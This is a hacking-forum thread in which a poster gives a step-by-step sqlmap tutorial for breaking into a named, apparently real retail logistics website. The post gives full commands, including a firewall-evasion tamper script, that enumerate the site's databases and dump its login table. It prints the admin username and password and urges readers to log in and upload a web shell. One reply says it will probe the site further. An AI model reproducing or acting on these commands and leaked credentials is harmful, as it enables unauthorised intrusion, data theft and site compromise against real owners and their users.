chevron_left chevron_right
Login Register invert_colors photo_library
Thread Rating:
  • 0 Vote(s) - 0 Average


filter_list did you tired from watching ? come to hack with me (photo)
Author
Message
did you tired from watching ? come to hack with me (photo) #1
Hello everybody  Biggrin

i will explain to use sqlmap on windows

download
Click Here

extract in C:\ folder
rename to sqlmap

now we will search to site has an exploit ( SQL )
this site for learn
( http://www.retaillogistics.net/show_temp...gory=About )
after url put ( ' )
http://www.retaillogistics.net/show_temp...gory=About'
if any change happen in page ( hidden photo , show mistake .. etc ) that's mean has exploit ,,
in the site after you put ' will be like this
[Image: 1.jpg]
now we will hacked  Cool

press (windows + r) or open cmd
follow instruction
1- cd ..
2- cd sqlmap <this name of folder i said before rename to sqlmap
3- sqlmap.py -u "http://www.retaillogistics.net/show_template.php?topic_ID=4&category=About" --dbms=mysql --tamper modsecurityzeroversioned.py --dbs --random-agent
be careful the url without ( ' )

now you will see database of site ,,  Heart
[Image: 2.jpg]

now change --dbs to -D and name of database,  after that --tables to show tables of database !!  like this :
sqlmap.py -u "http://www.retaillogistics.net/show_template.php?topic_ID=4&category=About" --dbms=mysql --tamper modsecurityzeroversioned.py -D 97381_retaillogistic --tables --random-agent

[Image: 3.jpg]

we just need table of login ( name of table contain user and password - login,admin,member,panel,control,,,etc )

now change --tables to -T and name of tables !! like this  Evil
sqlmap.py -u "http://www.retaillogistics.net/show_template.php?topic_ID=4&category=About" --dbms=mysql --tamper modsecurityzeroversioned.py -D 97381_retaillogistic -T login --dump --random-agent

[Image: 4.jpg]

Evil  Evil  Evil
go to login page

click here to enjoy

username is admin
password is retail@2012

go to Manage Schedule Files
upload your shell ,,

Thanks  Wink
I'm sorry I now little English
Mr.Mr8n
[ Be a leader when you see a path others have missed ]

~#  .. ^_^ ..  #~

|SnapChat : Mr.Mr8n|

|InstaGram : Mr8n|
~

Reply

RE: did you tired from watching ? come to hack with me (photo) #2
I hope that is not a legit website. Notamused

Reply

RE: did you tired from watching ? come to hack with me (photo) #3
Upon testing the site briefly via manual Input, It seems to sanitize user Input with escaped data for predefined characters.

I'll check It out further later tonight/early tomorrow against other attack vectors.
[Image: AD83g1A.png]

Reply






Users browsing this thread: 1 Guest(s)